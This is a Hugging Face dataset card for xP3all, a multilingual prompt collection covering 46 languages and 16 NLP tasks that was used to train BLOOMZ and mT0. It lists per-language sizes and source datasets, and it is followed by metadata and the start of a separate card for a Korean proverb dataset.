- **Paper:** [Crosslingual Generalization through Multitask Finetuning](https://arxiv.org/abs/2211.01786)
- **Point of Contact:** [Niklas Muennighoff](mailto:[email protected])
### Dataset Summary
> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.
- **Creation:** The dataset can be recreated using instructions available [here](https://github.com/bigscience-workshop/xmtf#create-xp3). We provide this version to save processing time and ease reproducibility.
- **Languages:** 46 (Can be extended by [recreating with more splits](https://github.com/bigscience-workshop/xmtf#create-xp3))
- **xP3 Dataset Family:**
<table>
<tr>
<th>Name</th>
<th>Explanation</th>
<th>Example models</th>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/Muennighoff/xP3x>xP3x</a></t>
<td>Mixture of 17 tasks in 277 languages with English prompts</td>
<td>WIP - Join us at Project Aya @<a href=https://cohere.for.ai/>C4AI</a> to help!</td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3>xP3</a></t>
<td>Mixture of 13 training tasks in 46 languages with English prompts</td>
<td><a href=https://huggingface.co/bigscience/bloomz>bloomz</a> & <a href=https://huggingface.co/bigscience/mt0-xxl>mt0-xxl</a></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3mt>xP3mt</a></t>
<td>Mixture of 13 training tasks in 46 languages with prompts in 20 languages (machine-translated from English)</td>
<td><a href=https://huggingface.co/bigscience/bloomz-mt>bloomz-mt</a> & <a href=https://huggingface.co/bigscience/mt0-xxl-mt>mt0-xxl-mt</a></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3all>xP3all</a></t>
<td>xP3 + evaluation datasets adding an additional 3 tasks for a total of 16 tasks in 46 languages with English prompts</td>
<td></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/bigscience/xP3megds>xP3megds</a></t>
<td><a href=https://github.com/bigscience-workshop/Megatron-DeepSpeed>Megatron-DeepSpeed</a> processed version of xP3</td>
<td><a href=https://huggingface.co/bigscience/bloomz>bloomz</a></td>
</tr>
<tr>
<td><a href=https://huggingface.co/datasets/Muennighoff/P3>P3</a></t>
<td>Repreprocessed version of the English-only <a href=https://huggingface.co/datasets/bigscience/P3>P3</a> with 8 training tasks</td>
<td><a href=https://huggingface.co/bigscience/bloomz-p3>bloomz-p3</a> & <a href=https://huggingface.co/bigscience/mt0-xxl-p3>mt0-xxl-p3</a></td>
</tr>
</table>
## Dataset Structure
### Data Instances
An example of "train" looks as follows:
```json
{
"inputs": "Sentence 1: Fue académico en literatura metafísica, teología y ciencias clásicas.\nSentence 2: Fue académico en literatura metafísica, teología y ciencia clásica.\nQuestion: Can we rewrite Sentence 1 to Sentence 2? Yes or No?",
"targets": "Yes"
}
```
### Data Fields
The data fields are the same among all splits (a minimal loading sketch follows this list):
- `inputs`: the natural language input fed to the model
- `targets`: the natural language target that the model has to generate
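For reference, a minimal loading sketch; the per-language config name ("en") is an assumption based on the splits table below, not something documented in this card:
```python
from datasets import load_dataset

# Assumption: subsets are organized per language, e.g. an "en" config.
ds = load_dataset("bigscience/xP3all", "en", split="train")

example = ds[0]
print(example["inputs"])   # the prompt fed to the model
print(example["targets"])  # the expected generation
```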
### Data Splits
The table below summarizes sizes per language (computed from the `merged_{lang}.jsonl` files). Because languages like `tw` consist only of single-sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.
|Language|Kilobytes|%|Samples|%|
|--------|------:|-:|---:|-:|
|tw|106288|0.11|265071|0.33|
|bm|107056|0.11|265180|0.33|
|ak|108096|0.11|265071|0.33|
|ca|110608|0.11|271191|0.33|
|eu|113008|0.11|281199|0.35|
|fon|113072|0.11|265063|0.33|
|st|114080|0.11|265063|0.33|
|ki|115040|0.12|265180|0.33|
|tum|116032|0.12|265063|0.33|
|wo|122560|0.12|365063|0.45|
|ln|126304|0.13|365060|0.45|
|as|156256|0.16|265063|0.33|
|or|161472|0.16|265063|0.33|
|kn|165456|0.17|265063|0.33|
|ml|175040|0.18|265864|0.33|
|rn|192992|0.19|318189|0.39|
|nso|229712|0.23|915051|1.13|
|tn|235536|0.24|915054|1.13|
|lg|235936|0.24|915021|1.13|
|rw|249360|0.25|915043|1.13|
|ts|250256|0.25|915044|1.13|
|sn|252496|0.25|865056|1.07|
|xh|254672|0.26|915058|1.13|
|zu|263712|0.26|915061|1.13|
|ny|272128|0.27|915063|1.13|
|ig|325232|0.33|950097|1.17|
|yo|352784|0.35|918416|1.13|
|ne|393680|0.39|315754|0.39|
|pa|523248|0.52|339210|0.42|
|gu|560688|0.56|347499|0.43|
|sw|566656|0.57|1130481|1.4|
|mr|666240|0.67|417269|0.52|
|bn|832720|0.83|428843|0.53|
|ta|926912|0.93|415433|0.51|
|te|1343232|1.35|584590|0.72|
|ur|1918272|1.92|855756|1.06|
|vi|3102512|3.11|1672106|2.07|
|code|4330752|4.34|2707724|3.34|
|hi|4403568|4.41|1554667|1.92|
|zh|4599440|4.61|3589234|4.43|
|id|4612256|4.62|2643418|3.27|
|ar|4683456|4.69|2160181|2.67|
|fr|6591120|6.6|5316403|6.57|
|pt|6886800|6.9|3752156|4.63|
|es|8587920|8.6|5413205|6.69|
|en|39252528|39.33|32740750|40.44|
|total|99807184|100.0|80956089|100.0|
## Dataset Creation
### Source Data
#### Training datasets
- Code Miscellaneous
- [CodeComplex](https://huggingface.co/datasets/codeparrot/codecomplex)
- [Docstring Corpus](https://huggingface.co/datasets/teven/code_docstring_corpus)
- [GreatCode](https://huggingface.co/datasets/great_code)
- [State Changes](https://huggingface.co/datasets/Fraser/python-state-changes)
- Closed-book QA
- [Hotpot QA](https://huggingface.co/datasets/hotpot_qa)
- [Trivia QA](https://huggingface.co/datasets/trivia_qa)
- [Web Questions](https://huggingface.co/datasets/web_questions)
- [Wiki QA](https://huggingface.co/datasets/wiki_qa)
- Extractive QA
- [Adversarial QA](https://huggingface.co/datasets/adversarial_qa)
- [CMRC2018](https://huggingface.co/datasets/cmrc2018)
- [DRCD](https://huggingface.co/datasets/clue)
- [DuoRC](https://huggingface.co/datasets/duorc)
- [MLQA](https://huggingface.co/datasets/mlqa)
- [Quoref](https://huggingface.co/datasets/quoref)
- [ReCoRD](https://huggingface.co/datasets/super_glue)
- [ROPES](https://huggingface.co/datasets/ropes)
- [SQuAD v2](https://huggingface.co/datasets/squad_v2)
- [xQuAD](https://huggingface.co/datasets/xquad)
- TyDI QA
- [Primary](https://huggingface.co/datasets/khalidalt/tydiqa-primary)
- [Goldp](https://huggingface.co/datasets/khalidalt/tydiqa-goldp)
- Multiple-Choice QA
- [ARC](https://huggingface.co/datasets/ai2_arc)
- [C3](https://huggingface.co/datasets/c3)
- [CoS-E](https://huggingface.co/datasets/cos_e)
- [Cosmos](https://huggingface.co/datasets/cosmos)
- [DREAM](https://huggingface.co/datasets/dream)
- [MultiRC](https://huggingface.co/datasets/super_glue)
- [OpenBookQA](https://huggingface.co/datasets/openbookqa)
- [PiQA](https://huggingface.co/datasets/piqa)
- [QUAIL](https://huggingface.co/datasets/quail)
- [QuaRel](https://huggingface.co/datasets/quarel)
- [QuaRTz](https://huggingface.co/datasets/quartz)
- [QASC](https://huggingface.co/datasets/qasc)
- [RACE](https://huggingface.co/datasets/race)
- [SciQ](https://huggingface.co/datasets/sciq)
- [Social IQA](https://huggingface.co/datasets/social_i_qa)
- [Wiki Hop](https://huggingface.co/datasets/wiki_hop)
- [WiQA](https://huggingface.co/datasets/wiqa)
- Paraphrase Identification
- [MRPC](https://huggingface.co/datasets/super_glue)
- [PAWS](https://huggingface.co/datasets/paws)
- [PAWS-X](https://huggingface.co/datasets/paws-x)
- [QQP](https://huggingface.co/datasets/qqp)
- Program Synthesis
- [APPS](https://huggingface.co/datasets/codeparrot/apps)
- [CodeContests](https://huggingface.co/datasets/teven/code_contests)
- [JupyterCodePairs](https://huggingface.co/datasets/codeparrot/github-jupyter-text-code-pairs)
- [MBPP](https://huggingface.co/datasets/Muennighoff/mbpp)
- [NeuralCodeSearch](https://huggingface.co/datasets/neural_code_search)
- [XLCoST](https://huggingface.co/datasets/codeparrot/xlcost-text-to-code)
- Structure-to-text
- [Common Gen](https://huggingface.co/datasets/common_gen)
- [Wiki Bio](https://huggingface.co/datasets/wiki_bio)
- Sentiment
- [Amazon](https://huggingface.co/datasets/amazon_polarity)
- [App Reviews](https://huggingface.co/datasets/app_reviews)
- [IMDB](https://huggingface.co/datasets/imdb)
- [Rotten Tomatoes](https://huggingface.co/datasets/rotten_tomatoes)
- [Yelp](https://huggingface.co/datasets/yelp_review_full)
- Simplification
- [BiSECT](https://huggingface.co/datasets/GEM/BiSECT)
- Summarization
- [CNN Daily Mail](https://huggingface.co/datasets/cnn_dailymail)
- [Gigaword](https://huggingface.co/datasets/gigaword)
- [MultiNews](https://huggingface.co/datasets/multi_news)
- [SamSum](https://huggingface.co/datasets/samsum)
- [Wiki-Lingua](https://huggingface.co/datasets/GEM/wiki_lingua)
- [XLSum](https://huggingface.co/datasets/GEM/xlsum)
- [XSum](https://huggingface.co/datasets/xsum)
- Topic Classification
- [AG News](https://huggingface.co/datasets/ag_news)
- [DBPedia](https://huggingface.co/datasets/dbpedia_14)
- [TNEWS](https://huggingface.co/datasets/clue)
- [TREC](https://huggingface.co/datasets/trec)
- [CSL](https://huggingface.co/datasets/clue)
- Translation
- [Flores-200](https://huggingface.co/datasets/Muennighoff/flores200)
- [Tatoeba](https://huggingface.co/datasets/Helsinki-NLP/tatoeba_mt)
- Word Sense disambiguation
- [WiC](https://huggingface.co/datasets/super_glue)
- [XL-WiC](https://huggingface.co/datasets/pasinit/xlwic)
#### Evaluation datasets (included in [xP3all](https://huggingface.co/datasets/bigscience/xP3all) except for HumanEval)
- Natural Language Inference
- [ANLI](https://huggingface.co/datasets/anli)
- [CB](https://huggingface.co/datasets/super_glue)
- [RTE](https://huggingface.co/datasets/super_glue)
- [XNLI](https://huggingface.co/datasets/xnli)
- Coreference Resolution
- [Winogrande](https://huggingface.co/datasets/winogrande)
- [XWinograd](https://huggingface.co/datasets/Muennighoff/xwinograd)
- Program Synthesis
- [HumanEval](https://huggingface.co/datasets/openai_humaneval)
- Sentence Completion
- [COPA](https://huggingface.co/datasets/super_glue)
- [Story Cloze](https://huggingface.co/datasets/story_cloze)
- [XCOPA](https://huggingface.co/datasets/xcopa)
- [XStoryCloze](https://huggingface.co/datasets/Muennighoff/xstory_cloze)
#### Additional [xP3all](https://huggingface.co/datasets/bigscience/xP3all) datasets
- Coreference Resolution
- [WSC (Fixed)](https://huggingface.co/datasets/super_glue)
- Sentence Completion
- [HellaSwag](https://huggingface.co/datasets/hellaswag)
- Translation
- [MultiEurlex](https://huggingface.co/datasets/multi_eurlex)
## Additional Information
### Licensing Information
The dataset is released under Apache 2.0.
### Citation Information
```bibtex
@misc{muennighoff2022crosslingual,
title={Crosslingual Generalization through Multitask Finetuning},
author={Niklas Muennighoff and Thomas Wang and Lintang Sutawika and Adam Roberts and Stella Biderman and Teven Le Scao and M Saiful Bari and Sheng Shen and Zheng-Xin Yong and Hailey Schoelkopf and Xiangru Tang and Dragomir Radev and Alham Fikri Aji and Khalid Almubarak and Samuel Albanie and Zaid Alyafeai and Albert Webson and Edward Raff and Colin Raffel},
year={2022},
eprint={2211.01786},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
### Contributions
Thanks to the contributors of [promptsource](https://github.com/bigscience-workshop/promptsource/graphs/contributors) for adding many prompts used in this dataset. | bigscience/xP3all | [
"task_categories:other",
"annotations_creators:expert-generated",
"annotations_creators:crowdsourced",
"multilinguality:multilingual",
"size_categories:100M<n<1B",
"language:ak",
"language:ar",
"language:as",
"language:bm",
"language:bn",
"language:ca",
"language:code",
"language:en",
"language:es",
"language:eu",
"language:fon",
"language:fr",
"language:gu",
"language:hi",
"language:id",
"language:ig",
"language:ki",
"language:kn",
"language:lg",
"language:ln",
"language:ml",
"language:mr",
"language:ne",
"language:nso",
"language:ny",
"language:or",
"language:pa",
"language:pt",
"language:rn",
"language:rw",
"language:sn",
"language:st",
"language:sw",
"language:ta",
"language:te",
"language:tn",
"language:ts",
"language:tum",
"language:tw",
"language:ur",
"language:vi",
"language:wo",
"language:xh",
"language:yo",
"language:zh",
"language:zu",
"license:apache-2.0",
"arxiv:2211.01786",
"region:us"
] | 2022-07-30T20:05:02+00:00 | {"annotations_creators": ["expert-generated", "crowdsourced"], "language": ["ak", "ar", "as", "bm", "bn", "ca", "code", "en", "es", "eu", "fon", "fr", "gu", "hi", "id", "ig", "ki", "kn", "lg", "ln", "ml", "mr", "ne", "nso", "ny", "or", "pa", "pt", "rn", "rw", "sn", "st", "sw", "ta", "te", "tn", "ts", "tum", "tw", "ur", "vi", "wo", "xh", "yo", "zh", "zu"], "license": ["apache-2.0"], "multilinguality": ["multilingual"], "size_categories": ["100M<n<1B"], "task_categories": ["other"], "pretty_name": "xP3", "programming_language": ["C", "C++", "C#", "Go", "Java", "JavaScript", "Lua", "PHP", "Python", "Ruby", "Rust", "Scala", "TypeScript"]} | 2023-05-30T14:51:40+00:00 | [
"2211.01786"
] | [
"ak",
"ar",
"as",
"bm",
"bn",
"ca",
"code",
"en",
"es",
"eu",
"fon",
"fr",
"gu",
"hi",
"id",
"ig",
"ki",
"kn",
"lg",
"ln",
"ml",
"mr",
"ne",
"nso",
"ny",
"or",
"pa",
"pt",
"rn",
"rw",
"sn",
"st",
"sw",
"ta",
"te",
"tn",
"ts",
"tum",
"tw",
"ur",
"vi",
"wo",
"xh",
"yo",
"zh",
"zu"
] | TAGS
#task_categories-other #annotations_creators-expert-generated #annotations_creators-crowdsourced #multilinguality-multilingual #size_categories-100M<n<1B #language-Akan #language-Arabic #language-Assamese #language-Bambara #language-Bengali #language-Catalan #language-code #language-English #language-Spanish #language-Basque #language-Fon #language-French #language-Gujarati #language-Hindi #language-Indonesian #language-Igbo #language-Kikuyu #language-Kannada #language-Ganda #language-Lingala #language-Malayalam #language-Marathi #language-Nepali (macrolanguage) #language-Pedi #language-Nyanja #language-Oriya (macrolanguage) #language-Panjabi #language-Portuguese #language-Rundi #language-Kinyarwanda #language-Shona #language-Southern Sotho #language-Swahili (macrolanguage) #language-Tamil #language-Telugu #language-Tswana #language-Tsonga #language-Tumbuka #language-Twi #language-Urdu #language-Vietnamese #language-Wolof #language-Xhosa #language-Yoruba #language-Chinese #language-Zulu #license-apache-2.0 #arxiv-2211.01786 #region-us
| Dataset Card for xP3
====================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
* Additional Information
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Repository: URL
* Paper: Crosslingual Generalization through Multitask Finetuning
* Point of Contact: Niklas Muennighoff
### Dataset Summary
>
> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.
>
>
>
* Creation: The dataset can be recreated using instructions available here. We provide this version to save processing time and ease reproducibility.
* Languages: 46 (Can be extended by recreating with more splits)
* xP3 Dataset Family:
Dataset Structure
-----------------
### Data Instances
An example of "train" looks as follows:
### Data Fields
The data fields are the same among all splits:
* 'inputs': the natural language input fed to the model
* 'targets': the natural language target that the model has to generate
### Data Splits
The table below summarizes sizes per language (computed from the 'merged\_{lang}.jsonl' files). Because languages like 'tw' consist only of single-sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.
Dataset Creation
----------------
### Source Data
#### Training datasets
* Code Miscellaneous
+ CodeComplex
+ Docstring Corpus
+ GreatCode
+ State Changes
* Closed-book QA
+ Hotpot QA
+ Trivia QA
+ Web Questions
+ Wiki QA
* Extractive QA
+ Adversarial QA
+ CMRC2018
+ DRCD
+ DuoRC
+ MLQA
+ Quoref
+ ReCoRD
+ ROPES
+ SQuAD v2
+ xQuAD
+ TyDI QA
- Primary
- Goldp
* Multiple-Choice QA
+ ARC
+ C3
+ CoS-E
+ Cosmos
+ DREAM
+ MultiRC
+ OpenBookQA
+ PiQA
+ QUAIL
+ QuaRel
+ QuaRTz
+ QASC
+ RACE
+ SciQ
+ Social IQA
+ Wiki Hop
+ WiQA
* Paraphrase Identification
+ MRPC
+ PAWS
+ PAWS-X
+ QQP
* Program Synthesis
+ APPS
+ CodeContests
+ JupyterCodePairs
+ MBPP
+ NeuralCodeSearch
+ XLCoST
* Structure-to-text
+ Common Gen
+ Wiki Bio
* Sentiment
+ Amazon
+ App Reviews
+ IMDB
+ Rotten Tomatoes
+ Yelp
* Simplification
+ BiSECT
* Summarization
+ CNN Daily Mail
+ Gigaword
+ MultiNews
+ SamSum
+ Wiki-Lingua
+ XLSum
+ XSum
* Topic Classification
+ AG News
+ DBPedia
+ TNEWS
+ TREC
+ CSL
* Translation
+ Flores-200
+ Tatoeba
* Word Sense disambiguation
+ WiC
+ XL-WiC
#### Evaluation datasets (included in xP3all except for HumanEval)
* Natural Language Inference
+ ANLI
+ CB
+ RTE
+ XNLI
* Coreference Resolution
+ Winogrande
+ XWinograd
* Program Synthesis
+ HumanEval
* Sentence Completion
+ COPA
+ Story Cloze
+ XCOPA
+ XStoryCloze
#### Additional xP3all datasets
* Coreference Resolution
+ WSC (Fixed)
* Sentence Completion
+ HellaSwag
* Translation
+ MultiEurlex
Additional Information
----------------------
### Licensing Information
The dataset is released under Apache 2.0.
### Contributions
Thanks to the contributors of promptsource for adding many prompts used in this dataset.
| [
"### Dataset Summary\n\n\n\n> \n> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 of languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.\n> \n> \n> \n\n\n* Creation: The dataset can be recreated using instructions available here. We provide this version to save processing time and ease reproducibility.\n* Languages: 46 (Can be extended by recreating with more splits)\n* xP3 Dataset Family:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example of \"train\" looks as follows:",
"### Data Fields\n\n\nThe data fields are the same among all splits:\n\n\n* 'inputs': the natural language input fed to the model\n* 'targets': the natural language target that the model has to generate",
"### Data Splits\n\n\nThe below table summarizes sizes per language (computed from the 'merged\\_{lang}.jsonl' files). Due to languages like 'tw' only being single sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Training datasets\n\n\n* Code Miscellaneous\n\t+ CodeComplex\n\t+ Docstring Corpus\n\t+ GreatCode\n\t+ State Changes\n* Closed-book QA\n\t+ Hotpot QA\n\t+ Trivia QA\n\t+ Web Questions\n\t+ Wiki QA\n* Extractive QA\n\t+ Adversarial QA\n\t+ CMRC2018\n\t+ DRCD\n\t+ DuoRC\n\t+ MLQA\n\t+ Quoref\n\t+ ReCoRD\n\t+ ROPES\n\t+ SQuAD v2\n\t+ xQuAD\n\t+ TyDI QA\n\t\t- Primary\n\t\t- Goldp\n* Multiple-Choice QA\n\t+ ARC\n\t+ C3\n\t+ CoS-E\n\t+ Cosmos\n\t+ DREAM\n\t+ MultiRC\n\t+ OpenBookQA\n\t+ PiQA\n\t+ QUAIL\n\t+ QuaRel\n\t+ QuaRTz\n\t+ QASC\n\t+ RACE\n\t+ SciQ\n\t+ Social IQA\n\t+ Wiki Hop\n\t+ WiQA\n* Paraphrase Identification\n\t+ MRPC\n\t+ PAWS\n\t+ PAWS-X\n\t+ QQP\n* Program Synthesis\n\t+ APPS\n\t+ CodeContests\n\t+ JupyterCodePairs\n\t+ MBPP\n\t+ NeuralCodeSearch\n\t+ XLCoST\n* Structure-to-text\n\t+ Common Gen\n\t+ Wiki Bio\n* Sentiment\n\t+ Amazon\n\t+ App Reviews\n\t+ IMDB\n\t+ Rotten Tomatoes\n\t+ Yelp\n* Simplification\n\t+ BiSECT\n* Summarization\n\t+ CNN Daily Mail\n\t+ Gigaword\n\t+ MultiNews\n\t+ SamSum\n\t+ Wiki-Lingua\n\t+ XLSum\n\t+ XSum\n* Topic Classification\n\t+ AG News\n\t+ DBPedia\n\t+ TNEWS\n\t+ TREC\n\t+ CSL\n* Translation\n\t+ Flores-200\n\t+ Tatoeba\n* Word Sense disambiguation\n\t+ WiC\n\t+ XL-WiC",
"#### Evaluation datasets (included in xP3all except for HumanEval)\n\n\n* Natural Language Inference\n\t+ ANLI\n\t+ CB\n\t+ RTE\n\t+ XNLI\n* Coreference Resolution\n\t+ Winogrande\n\t+ XWinograd\n* Program Synthesis\n\t+ HumanEval\n* Sentence Completion\n\t+ COPA\n\t+ Story Cloze\n\t+ XCOPA\n\t+ XStoryCloze",
"#### Additional xP3all datasets\n\n\n* Coreference Resolution\n\t+ WSC (Fixed)\n* Sentence Completion\n\t+ HellaSwag\n* Translation\n\t+ MultiEurlex\n\n\nAdditional Information\n----------------------",
"### Licensing Information\n\n\nThe dataset is released under Apache 2.0.",
"### Contributions\n\n\nThanks to the contributors of promptsource for adding many prompts used in this dataset."
] | [
"TAGS\n#task_categories-other #annotations_creators-expert-generated #annotations_creators-crowdsourced #multilinguality-multilingual #size_categories-100M<n<1B #language-Akan #language-Arabic #language-Assamese #language-Bambara #language-Bengali #language-Catalan #language-code #language-English #language-Spanish #language-Basque #language-Fon #language-French #language-Gujarati #language-Hindi #language-Indonesian #language-Igbo #language-Kikuyu #language-Kannada #language-Ganda #language-Lingala #language-Malayalam #language-Marathi #language-Nepali (macrolanguage) #language-Pedi #language-Nyanja #language-Oriya (macrolanguage) #language-Panjabi #language-Portuguese #language-Rundi #language-Kinyarwanda #language-Shona #language-Southern Sotho #language-Swahili (macrolanguage) #language-Tamil #language-Telugu #language-Tswana #language-Tsonga #language-Tumbuka #language-Twi #language-Urdu #language-Vietnamese #language-Wolof #language-Xhosa #language-Yoruba #language-Chinese #language-Zulu #license-apache-2.0 #arxiv-2211.01786 #region-us \n",
"### Dataset Summary\n\n\n\n> \n> xP3 (Crosslingual Public Pool of Prompts) is a collection of prompts & datasets across 46 of languages & 16 NLP tasks. It is used for the training of BLOOMZ and mT0, multilingual language models capable of following human instructions in dozens of languages zero-shot.\n> \n> \n> \n\n\n* Creation: The dataset can be recreated using instructions available here. We provide this version to save processing time and ease reproducibility.\n* Languages: 46 (Can be extended by recreating with more splits)\n* xP3 Dataset Family:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example of \"train\" looks as follows:",
"### Data Fields\n\n\nThe data fields are the same among all splits:\n\n\n* 'inputs': the natural language input fed to the model\n* 'targets': the natural language target that the model has to generate",
"### Data Splits\n\n\nThe below table summarizes sizes per language (computed from the 'merged\\_{lang}.jsonl' files). Due to languages like 'tw' only being single sentence translation samples from Flores, their byte percentage is significantly lower than their sample percentage.\n\n\n\nDataset Creation\n----------------",
"### Source Data",
"#### Training datasets\n\n\n* Code Miscellaneous\n\t+ CodeComplex\n\t+ Docstring Corpus\n\t+ GreatCode\n\t+ State Changes\n* Closed-book QA\n\t+ Hotpot QA\n\t+ Trivia QA\n\t+ Web Questions\n\t+ Wiki QA\n* Extractive QA\n\t+ Adversarial QA\n\t+ CMRC2018\n\t+ DRCD\n\t+ DuoRC\n\t+ MLQA\n\t+ Quoref\n\t+ ReCoRD\n\t+ ROPES\n\t+ SQuAD v2\n\t+ xQuAD\n\t+ TyDI QA\n\t\t- Primary\n\t\t- Goldp\n* Multiple-Choice QA\n\t+ ARC\n\t+ C3\n\t+ CoS-E\n\t+ Cosmos\n\t+ DREAM\n\t+ MultiRC\n\t+ OpenBookQA\n\t+ PiQA\n\t+ QUAIL\n\t+ QuaRel\n\t+ QuaRTz\n\t+ QASC\n\t+ RACE\n\t+ SciQ\n\t+ Social IQA\n\t+ Wiki Hop\n\t+ WiQA\n* Paraphrase Identification\n\t+ MRPC\n\t+ PAWS\n\t+ PAWS-X\n\t+ QQP\n* Program Synthesis\n\t+ APPS\n\t+ CodeContests\n\t+ JupyterCodePairs\n\t+ MBPP\n\t+ NeuralCodeSearch\n\t+ XLCoST\n* Structure-to-text\n\t+ Common Gen\n\t+ Wiki Bio\n* Sentiment\n\t+ Amazon\n\t+ App Reviews\n\t+ IMDB\n\t+ Rotten Tomatoes\n\t+ Yelp\n* Simplification\n\t+ BiSECT\n* Summarization\n\t+ CNN Daily Mail\n\t+ Gigaword\n\t+ MultiNews\n\t+ SamSum\n\t+ Wiki-Lingua\n\t+ XLSum\n\t+ XSum\n* Topic Classification\n\t+ AG News\n\t+ DBPedia\n\t+ TNEWS\n\t+ TREC\n\t+ CSL\n* Translation\n\t+ Flores-200\n\t+ Tatoeba\n* Word Sense disambiguation\n\t+ WiC\n\t+ XL-WiC",
"#### Evaluation datasets (included in xP3all except for HumanEval)\n\n\n* Natural Language Inference\n\t+ ANLI\n\t+ CB\n\t+ RTE\n\t+ XNLI\n* Coreference Resolution\n\t+ Winogrande\n\t+ XWinograd\n* Program Synthesis\n\t+ HumanEval\n* Sentence Completion\n\t+ COPA\n\t+ Story Cloze\n\t+ XCOPA\n\t+ XStoryCloze",
"#### Additional xP3all datasets\n\n\n* Coreference Resolution\n\t+ WSC (Fixed)\n* Sentence Completion\n\t+ HellaSwag\n* Translation\n\t+ MultiEurlex\n\n\nAdditional Information\n----------------------",
"### Licensing Information\n\n\nThe dataset is released under Apache 2.0.",
"### Contributions\n\n\nThanks to the contributors of promptsource for adding many prompts used in this dataset."
] |
5aa6d7d0c90976162beb9e98f11df3bdae500118 | # Korean Proverbs Collection v1.0
This dataset was built by cleaning the proverbs in Urimalsaem, the open dictionary of the National Institute of Korean Language.
- Removed proverbs containing words no longer used in modern Korean
- Removed variants expressed in parentheses
- Merged duplicate entries (a sketch of this cleaning follows the list)
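Illustrative only: the actual cleaning rules and word list are not published in this card, so every name below is an assumption.
```python
import re

def clean_proverbs(raw: list[str], outdated_words: set[str]) -> list[str]:
    """Sketch of the three cleaning steps described above."""
    cleaned = []
    for proverb in raw:
        # 1. Drop proverbs containing words no longer used in modern Korean.
        if any(word in proverb for word in outdated_words):
            continue
        # 2. Drop variants expressed in parentheses, e.g. "... (variant) ...".
        proverb = re.sub(r"\([^)]*\)", "", proverb).strip()
        cleaned.append(proverb)
    # 3. Merge duplicate entries.
    return sorted(set(cleaned))
```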
## Getting the original data
The original data, including explanations of each proverb, can be downloaded from Urimalsaem.
> You can browse the proverbs listed in the National Institute of Korean Language's online dictionaries using the 'Advanced Search' feature. Go to 'Advanced Search' in Urimalsaem, the dictionary with the largest number of proverbs, and select 'proverb' to get a list of every proverb in the dictionary.
https://opendict.korean.go.kr/
According to Urimalsaem's terms of service:
- The 'Creative Commons Attribution-ShareAlike 2.0 Korea License' applies.
- Anyone may use the material freely, including for commercial purposes, without special permission from the author.
- To use the work, the following conditions must be observed:
 1. Attribution: you must credit the author when using the material.
 2. ShareAlike: if you modify the material to create a new work, that work must be distributed under the same license. | mansiksohn/opendict-korean-proverb | [
"task_categories:text-generation",
"task_ids:language-modeling",
"annotations_creators:no-annotation",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:n<1K",
"source_datasets:original",
"language:ko",
"license:cc-by-2.0",
"korean",
"proverb",
"region:us"
] | 2022-07-31T02:05:28+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["found"], "language": ["ko"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["n<1K"], "source_datasets": ["original"], "task_categories": ["text-generation"], "task_ids": ["language-modeling"], "pretty_name": "\ud55c\uad6d\uc5b4 \uc18d\ub2f4 \ubaa8\uc74c v1.0", "tags": ["korean", "proverb"]} | 2022-07-31T02:23:30+00:00 | [] | [
"ko"
] | TAGS
#task_categories-text-generation #task_ids-language-modeling #annotations_creators-no-annotation #language_creators-found #multilinguality-monolingual #size_categories-n<1K #source_datasets-original #language-Korean #license-cc-by-2.0 #korean #proverb #region-us
| # Korean Proverbs Collection v1.0
This dataset was built by cleaning the proverbs in Urimalsaem, the open dictionary of the National Institute of Korean Language.
- Removed proverbs containing words no longer used in modern Korean
- Removed variants expressed in parentheses
- Merged duplicate entries
## Getting the original data
The original data, including explanations of each proverb, can be downloaded from Urimalsaem.
> You can browse the proverbs listed in the National Institute of Korean Language's online dictionaries using the 'Advanced Search' feature. Go to 'Advanced Search' in Urimalsaem, the dictionary with the largest number of proverbs, and select 'proverb' to get a list of every proverb in the dictionary.
URL
According to Urimalsaem's terms of service:
- The 'Creative Commons Attribution-ShareAlike 2.0 Korea License' applies.
- Anyone may use the material freely, including for commercial purposes, without special permission from the author.
- To use the work, the following conditions must be observed:
 1. Attribution: you must credit the author when using the material.
 2. ShareAlike: if you modify the material to create a new work, that work must be distributed under the same license. | [
"# 한국어 속담 모음 v1.0\n국립국어원 우리말샘의 속담을 정제해 만든 데이터입니다.\n- 현대에 맞지 않는 단어가 포함된 속담 삭제\n- 괄호로 표현된 변형 삭제\n- 중복내용 통합",
